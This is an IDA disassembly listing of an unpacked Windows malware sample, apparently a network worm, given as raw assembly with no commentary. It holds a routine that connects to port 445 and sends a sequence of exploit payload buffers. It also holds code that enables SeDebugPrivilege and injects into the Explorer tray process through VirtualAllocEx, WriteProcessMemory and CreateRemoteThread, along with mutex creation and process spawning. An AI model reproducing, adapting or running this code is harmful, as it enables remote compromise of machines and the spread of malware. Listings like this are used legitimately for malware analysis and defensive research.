;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 069F2C9A6CD4EDF28212CA7B71483B62
; File Name : u:\work\069f2c9a6cd4edf28212ca7b71483b62_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31501000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31501000 dd 77DE089Eh ; DATA XREF: sub_31502889+90�r
dword_31501004 dd 77DE07A3h ; DATA XREF: sub_31502889+A2�r
dword_31501008 dd 77DE0D79h ; DATA XREF: sub_31502889+C8�r
dword_3150100C dd 77DE0343h ; DATA XREF: sub_31502889+DB�r
; sub_31502889+FD�r
dword_31501010 dd 77DE0AF0h ; DATA XREF: sub_3150286E+6�r
dword_31501014 dd 77DE042Eh ; DATA XREF: sub_3150286E+11�r
dword_31501018 dd 77DDEBA2h ; DATA XREF: sub_3150281A+2�r
dword_3150101C dd 77DE0BB2h ; DATA XREF: sub_3150281A+41�r
dword_31501020 dd 77DD590Bh ; DATA XREF: sub_31502418+1A�r
dword_31501024 dd 77DD59F0h ; DATA XREF: sub_31502418+38�r
dword_31501028 dd 77DD23D7h ; DATA XREF: sub_315023BF+3E�r
dword_3150102C dd 77DD22EAh ; DATA XREF: sub_3150238A+14�r
; sub_315023BF+1D�r
dword_31501030 dd 77DD5C55h ; DATA XREF: sub_3150238A+24�r
dword_31501034 dd 77DD189Ah ; DATA XREF: sub_3150238A+2D�r
; sub_315023BF+4E�r ...
dword_31501038 dd 77E2A571h ; DATA XREF: sub_31501D89+160�r
align 10h
dword_31501040 dd 77E76432h, 77E7513Ch ; DATA XREF: sub_315036FD+14C�r
; sub_315036FD:loc_31503943�r ...
dword_31501048 dd 77E705C5h ; DATA XREF: sub_315029A2+4C�r
; sub_315029A2+14B�r
dword_3150104C dd 77E79D8Ch ; DATA XREF: sub_315029A2+F2�r
; sub_315035E3+ED�r
dword_31501050 dd 77E61608h ; DATA XREF: sub_31502889+10�r
; sub_3150334C+A�r
dword_31501054 dd 77E77C4Ch ; DATA XREF: sub_31502889+1E�r
dword_31501058 dd 77E79E34h ; DATA XREF: sub_315027EF+B�r
dword_3150105C dd 77E7980Ah ; DATA XREF: sub_315027DB+D�r
dword_31501060 dd 77E7A099h ; DATA XREF: sub_3150269D+17�r
dword_31501064 dd 77E76A2Eh ; DATA XREF: sub_3150269D+E9�r
dword_31501068 dd 77E704FCh ; DATA XREF: sub_315025D1+1B�r
; sub_315029A2+3F�r ...
dword_3150106C dd 77E74155h ; DATA XREF: sub_315025D1+40�r
; UPX0:31503423�r ...
dword_31501070 dd 77E6BD13h ; DATA XREF: sub_315025D1+71�r
dword_31501074 dd 77E684C6h ; DATA XREF: sub_315025D1+B0�r
dword_31501078 dd 77EBB1E7h ; DATA XREF: sub_31503A9C�r
dword_3150107C dd 77EBA595h ; DATA XREF: sub_31503A96�r
dword_31501080 dd 77E616B4h ; DATA XREF: sub_3150246B+9B�r
dword_31501084 dd 77EBA6E9h ; DATA XREF: sub_31503A90�r
dword_31501088 dd 77E73167h ; DATA XREF: sub_31502252+13�r
; sub_3150269D+8F�r ...
dword_3150108C dd 77E777EFh ; DATA XREF: sub_31502103+3F�r
; sub_3150218B+58�r
dword_31501090 dd 77E737DEh ; DATA XREF: sub_31501D89+2D�r
; sub_31502BC3+98�r
dword_31501094 dd 77E79D5Bh ; DATA XREF: sub_31501D75+8�r
; sub_31502BC3+C2�r
dword_31501098 dd 77E73628h ; DATA XREF: UPX0:31501D1D�r
; sub_315025D1+F�r
dword_3150109C dd 77F5157Dh ; DATA XREF: UPX0:31501D38�r
; sub_31502889:loc_3150295B�r ...
dword_315010A0 dd 77E74672h ; DATA XREF: sub_315011C0+253�r
; sub_315011C0+272�r ...
dword_315010A4 dd 77E61BE6h ; DATA XREF: sub_315011C0+16C�r
; sub_31501A62+E2�r ...
dword_315010A8 dd 77E73BEFh ; DATA XREF: sub_315011C0+4F�r
; sub_315029A2+69�r ...
dword_315010AC dd 77E79C90h ; DATA XREF: sub_31501727+4D�r
dword_315010B0 dd 77E7A5FDh ; DATA XREF: sub_31501727+13�r
; sub_315017AF+2C�r
dword_315010B4 dd 77E805D8h ; DATA XREF: sub_31501727+D�r
; sub_31501D89+D4�r
dword_315010B8 dd 77E61A90h ; DATA XREF: sub_315017AF+BC�r
dword_315010BC dd 77E77963h ; DATA XREF: sub_315017AF+AA�r
; sub_31501911+19�r ...
dword_315010C0 dd 77E706B7h ; DATA XREF: sub_315017AF+8A�r
; sub_3150246B+92�r
dword_315010C4 dd 77E79F93h ; DATA XREF: sub_315017AF+26�r
; UPX0:31501D0D�r
dword_315010C8 dd 77E7751Ah ; DATA XREF: sub_315018BA+12�r
; sub_315031C7+13�r ...
dword_315010CC dd 77E7C2C4h ; DATA XREF: sub_315018E8+8�r
dword_315010D0 dd 77E7AC37h ; DATA XREF: sub_315018F7+12�r
; sub_31501911+12�r ...
dword_315010D4 dd 77E61BB8h ; DATA XREF: sub_31501962+38�r
dword_315010D8 dd 77E74A3Bh ; DATA XREF: sub_31501A48+13�r
; sub_31502B27+1B�r
dword_315010DC dd 77E73AB3h ; DATA XREF: sub_31501A48+8�r
dword_315010E0 dd 77E73C49h ; DATA XREF: sub_31501A62+12A�r
; sub_31501B9B+66�r ...
dword_315010E4 dd 77E78B82h ; DATA XREF: sub_31501B9B+92�r
dword_315010E8 dd 77E793EFh ; DATA XREF: sub_31501B9B+6E�r
dword_315010EC dd 77E7A837h ; DATA XREF: sub_31501B9B+57�r
; sub_315029A2+83�r ...
dword_315010F0 dd 77E75CB5h ; DATA XREF: UPX0:31501D47�r
; sub_315025D1+C3�r
dd 0
dword_315010F8 dd 77C1BE00h ; DATA XREF: sub_315036FD+1F3�r
dword_315010FC dd 77C48520h ; DATA XREF: sub_31503A8A�r
dword_31501100 dd 77C48D44h ; DATA XREF: sub_31503A84�r
dword_31501104 dd 77C48674h ; DATA XREF: sub_31503A7E�r
; ---------------------------------------------------------------------------
loc_31501108: ; DATA XREF: sub_31503A78�r
xor [edx], bl
retn 0D877h ; DATA XREF: UPX0:loc_31503A72�r
; ---------------------------------------------------------------------------
db 1Ah, 0C2h, 77h
dword_31501110 dd 77C43500h ; DATA XREF: sub_31502C92+37�r
; sub_315036FD+B9�r
dword_31501114 dd 77C41FA0h ; DATA XREF: sub_31503A6C�r
dword_31501118 dd 77C41FB0h ; DATA XREF: sub_31503A66�r
; ---------------------------------------------------------------------------
loc_3150111C: ; DATA XREF: UPX0:loc_31503A60�r
mov al, 3Eh
retn
; ---------------------------------------------------------------------------
db 77h
dword_31501120 dd 77C43AB0h ; DATA XREF: sub_31501A62:loc_31501A93�r
; sub_3150246B+79�r ...
dword_31501124 dd 77C3528Dh ; DATA XREF: sub_31501932:loc_31501943�r
; sub_31501B9B:loc_31501C69�r ...
dword_31501128 dd 77C35280h ; DATA XREF: sub_315018BA+22�r
; sub_3150334C+5D�r
dword_3150112C dd 77C42E10h ; DATA XREF: sub_31503A1E�r
dword_31501130 dd 77C43710h ; DATA XREF: sub_31503A18�r
dword_31501134 dd 77C43490h ; DATA XREF: sub_31503A12�r
dd 0
dword_3150113C dd 77D4C96Ah ; DATA XREF: sub_315011C0+62�r
; sub_31501A62+8B�r ...
dword_31501140 dd 77D4456Bh ; DATA XREF: sub_315017AF+67�r
dword_31501144 dd 77D4BDCAh ; DATA XREF: sub_315017AF+5D�r
dword_31501148 dd 77D45CBCh ; DATA XREF: sub_315017AF+7A�r
align 10h
dword_31501150 dd 76214750h ; DATA XREF: sub_315035E3+A9�r
dword_31501154 dd 7620AFB6h ; DATA XREF: sub_315035E3+18�r
dword_31501158 dd 7620BD61h ; DATA XREF: sub_315035E3+DB�r
dword_3150115C dd 762211EFh ; DATA XREF: sub_31501A32+8�r
; UPX0:315022E2�r
dd 0
dword_31501164 dd 71AB1890h ; DATA XREF: sub_315031C7+50�r
dword_31501168 dd 71AB12A7h ; DATA XREF: sub_31501F46+5B�r
dword_3150116C dd 71AB41DAh ; DATA XREF: sub_31501CDF+10�r
dword_31501170 dd 71AB3ECEh ; DATA XREF: sub_31501B9B+100�r
; sub_31501F46+7A�r ...
dword_31501174 dd 71AB5DE2h ; DATA XREF: sub_31501B9B+10D�r
; sub_31501F46+93�r ...
dword_31501178 dd 71AB868Dh ; DATA XREF: sub_31501B9B+120�r
; sub_31501F46+B5�r ...
dword_3150117C dd 71AB32CAh ; DATA XREF: sub_315019F3+C�r
dword_31501180 dd 71AB1740h ; DATA XREF: sub_315019F3+17�r
dword_31501184 dd 71AB12F8h ; DATA XREF: sub_315019B8+7�r
dword_31501188 dd 71AB2BBFh ; DATA XREF: sub_315019B8+1E�r
; sub_315019F3+25�r
dword_3150118C dd 71AB3C22h ; DATA XREF: sub_315011C0+2B�r
; sub_31501B9B+AC�r ...
dword_31501190 dd 71AB401Ch ; DATA XREF: sub_315011C0+44�r
; sub_31502252+D�r
dword_31501194 dd 71AB1746h ; DATA XREF: sub_315011C0+147�r
; sub_31501B9B+F0�r ...
dword_31501198 dd 71AB3E5Dh ; DATA XREF: sub_315011C0+15D�r
; sub_31502DC7+46�r
dword_3150119C dd 71AB1AF4h ; DATA XREF: sub_315011C0+17B�r
; sub_31501A62+67�r ...
dword_315011A0 dd 71AB5690h ; DATA XREF: sub_315011C0+1A4�r
; sub_315011C0+1D8�r ...
dword_315011A4 dd 71AB8629h ; DATA XREF: sub_315011C0+550�r
; sub_31501A62+11B�r
dword_315011A8 dd 71AB1A6Dh ; DATA XREF: sub_315011C0+559�r
; sub_31501A62+122�r ...
align 10h
dword_315011B0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_31501D89+5�o
dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315011C0 proc near ; CODE XREF: sub_3150209F+36�p
; sub_31502103+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31503A30
mov eax, dword_315059CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_315059D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3150118C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31501720
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31501190 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_315010A8 ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_315059C0
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31501233: ; CODE XREF: sub_315011C0+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31501233
push 60h
lea eax, [ebp+var_E4]
push offset dword_315054E0
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A18 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31503A1E ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31503A18 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A18 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A18 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31503A1E ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31503A12 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31503A12 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31501194 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31501198 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31501716
mov esi, dword_315010A4
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3150119C
push 89h
push offset dword_315052C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A8h
push offset dword_31505354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0DEh
push offset dword_31505400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp eax, 46h
jl loc_3150170B
cmp [ebp+var_730], 31h
jnz loc_315015B6
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31503A12 ; memset
add esp, 0Ch
push offset byte_31505000
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset byte_31505000
push eax
call sub_31503A1E ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31503A1E ; memcpy
mov eax, dword_31505906
add esp, 0Ch
mov [ebp+var_798], eax
loc_31501457: ; CODE XREF: sub_315011C0+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 68h
push offset dword_31505544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A0h
push offset dword_315055B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp [ebp+arg_0], 0
jz loc_315016A6
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31505768
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31503A1E ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_315057D4
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31503A1E ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31505848
push eax
call sub_31503A1E ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_315016FE
; ---------------------------------------------------------------------------
loc_315015B6: ; CODE XREF: sub_315011C0+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31503A12 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31505940
push eax
call sub_31503A1E ; memcpy
push offset byte_31505000
call sub_31503A18 ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31505000
push eax
call sub_31503A1E ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_315059B8
push eax
call sub_31503A1E ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31505940
push eax
call sub_31503A1E ; memcpy
add esp, 40h
push offset byte_31505000
call sub_31503A18 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31505000
push eax
call sub_31503A1E ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31501652: ; CODE XREF: sub_315011C0+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31501652
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31503A12 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31503A12 ; memset
add esp, 18h
jmp loc_31501457
; ---------------------------------------------------------------------------
loc_315016A6: ; CODE XREF: sub_315011C0+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31505654
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31503A1E ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_315056D4
push eax
call sub_31503A1E ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_315016FE: ; CODE XREF: sub_315011C0+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_3150170B: ; CODE XREF: sub_315011C0+1AD�j
; sub_315011C0+1E1�j ...
push 2
push [ebp+var_4]
call dword_315011A4 ; shutdown
loc_31501716: ; CODE XREF: sub_315011C0+166�j
push [ebp+var_4]
call dword_315011A8 ; closesocket
pop esi
loc_31501720: ; CODE XREF: sub_315011C0+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_315011C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501727 proc near ; CODE XREF: UPX0:loc_31501D4D�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_315010B4 ; LoadLibraryA
mov esi, dword_315010B0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_315017AB
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_315017AB
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_315017AB
lea eax, [ebp+var_C]
push eax
push 20h
call dword_315010AC ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_315017AB: ; CODE XREF: sub_31501727+28�j
; sub_31501727+37�j ...
pop edi
pop esi
leave
retn
sub_31501727 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315017AF proc near ; CODE XREF: UPX0:31501D61�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_31506180
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_315010C4 ; GetModuleHandleA
mov esi, dword_315010B0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_315017F6
loc_315017F2: ; CODE XREF: sub_315017AF+54�j
push 1
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_315017F6: ; CODE XREF: sub_315017AF+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_315017F2
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31501144 ; FindWindowA
test eax, eax
jnz short loc_31501824
call dword_31501140 ; GetForegroundWindow
test eax, eax
jnz short loc_31501824
push 2
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_31501824: ; CODE XREF: sub_315017AF+65�j
; sub_315017AF+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31501148 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_315010C0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_3150184A
push 3
loc_31501847: ; CODE XREF: sub_315017AF+45�j
; sub_315017AF+73�j
pop eax
jmp short loc_315018B5
; ---------------------------------------------------------------------------
loc_3150184A: ; CODE XREF: sub_315017AF+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_315010BC
test eax, eax
jz short loc_315018A8
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_315010B8 ; WriteProcessMemory
push ds:dword_31506154
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31501894
push eax
call esi ; CloseHandle
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_31501894: ; CODE XREF: sub_315017AF+DE�j
push offset aUterm13i ; "uterm13i"
call sub_315018E8
pop ecx
mov [ebp+var_4], 5
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_315018A8: ; CODE XREF: sub_315017AF+B2�j
mov [ebp+var_4], 4
loc_315018AF: ; CODE XREF: sub_315017AF+E3�j
; sub_315017AF+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_315018B5: ; CODE XREF: sub_315017AF+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_315017AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018BA proc near ; CODE XREF: sub_31501B9B+B�p
; UPX0:31501D23�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_315010C8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31501128 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_315018BA endp
; =============== S U B R O U T I N E =======================================
sub_315018E8 proc near ; CODE XREF: sub_315017AF+EA�p
; UPX0:31501D2D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_315010CC ; CreateMutexA
retn
sub_315018E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018F7 proc near ; CODE XREF: sub_31501D89+12D�p
; sub_31501D89+138�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
pop ebp
retn
sub_315018F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501911 proc near ; CODE XREF: sub_31501B9B+12C�p
; sub_31501D89+113�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
push eax
call dword_315010BC ; CloseHandle
pop ebp
retn
sub_31501911 endp
; =============== S U B R O U T I N E =======================================
sub_31501932 proc near ; CODE XREF: sub_31501F46+26�p
; sub_315025D1+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_3150195A
loc_31501943: ; CODE XREF: sub_31501932+26�j
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31501943
loc_3150195A: ; CODE XREF: sub_31501932+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31501932 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501962 proc near ; CODE XREF: sub_315029A2+16B�p
; sub_315035E3+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31503A12 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_315010D4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_315010BC
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31501962 endp
; =============== S U B R O U T I N E =======================================
sub_315019B8 proc near ; CODE XREF: sub_31502DC7+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31501184 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_315019D5
test esi, esi
jnz short loc_315019E7
cmp byte ptr [edi], 30h
jz short loc_315019EE
loc_315019D5: ; CODE XREF: sub_315019B8+12�j
push edi
call dword_31501188 ; gethostbyname
test eax, eax
jz short loc_315019E7
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_315019E7: ; CODE XREF: sub_315019B8+16�j
; sub_315019B8+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_315019EE
xor esi, esi
loc_315019EE: ; CODE XREF: sub_315019B8+1B�j
; sub_315019B8+32�j
mov eax, esi
pop edi
pop esi
retn
sub_315019B8 endp
